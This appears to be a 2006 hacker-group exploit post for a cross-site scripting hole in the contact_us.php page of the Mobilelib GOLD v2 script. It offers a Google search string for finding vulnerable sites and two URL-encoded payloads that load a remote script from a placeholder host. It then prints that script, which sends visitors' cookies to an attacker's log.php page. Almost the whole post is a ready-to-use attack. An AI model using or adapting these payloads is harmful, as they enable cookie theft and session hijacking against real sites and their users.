///////////////////////////////////// // XSS in script Mobilelib GOLD v2 // //////////////////////////////////// Found By: viP HaCKEr Tame : AL-GaRNi Vendor: http://www.ac4p.com Software: Mobilelib GOLD GOLD v2 google : "Powered by ac4p.com" :::::::::::::::::::::::::::::::::::::: Description: Line 32 of contact_us.php ::::::::::::::::::::::::::::::::::::: code: } $html=getthemeM("show.tpl"); $html=eregi_replace("{marquee}","$Newnews",$html); include("block.php"); $errr=''; function chek_mail($email) { :::::::::::::::::::::::::::::::::::::: Exploits : http://[target]/[path]/contact_us.php?email=%20%22%3E%3Cscript%20src%3Dh ttp%3A//www.xxxx.com/swt.js%3E%3C/script%3E # //and http://[target]/[path]/contact_us.php?errr=%20%22%3E%3Cscript%20src%3Dht tp%3A//www.xxxx.com/swt.js%3E%3C/script%3E # /****************************************************************// //Content swt.js location.href='http://www.yoursite.com/log.php?swt='+escape(document.coo kie); # //End swt.js ############### Group AL-GaRNi ################## /**********************************************# /*SwEET-DeViL & viP HaCkEr & HaCkEr sUn *# /********************************************# #################(c)@2006#################### ########## gamr-14 (at) hotmail (dot) com [email concealed] ############# ########## Error-404 (at) msn (dot) com [email concealed] ########## ##########################################
